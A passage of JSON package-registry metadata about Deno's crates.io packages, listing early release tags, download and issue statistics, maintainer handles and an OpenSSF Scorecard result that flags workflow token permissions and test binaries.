t":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:11:21.954Z","dependent_packages_count":0,"downloads":18320,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.79306022268806,"dependent_repos_count":21.680388097909393,"dependent_packages_count":28.714926072826298,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":48.396124797807914},"purl":"pkg:cargo/deno_npm_installer","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npm_installer","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npm_installer","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npm_installer/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-05-19T15:40:04.104Z","updated_at":"2025-05-19T15:40:04.104Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-05-15T20:22:31.370Z","updated_at":"2025-05-15T20:22:31.370Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11889442,"name":"deno_signals","ecosystem":"cargo","description":"Signals for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":49,"first_release_published_at":"2025-07-08T11:29:09.304Z","latest_release_published_at":"2026-08-27T15:19:56.339Z","latest_release_number":"0.49.0","last_synced_at":"2026-08-29T21:56:47.780Z","created_at":"2025-07-08T11:31:10.744Z","updated_at":"2026-08-29T21:56:47.780Z","registry_url":"https://crates.io/crates/deno_signals/","install_command":"cargo install deno_signals","documentation_url":"https://docs.rs/deno_signals/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: 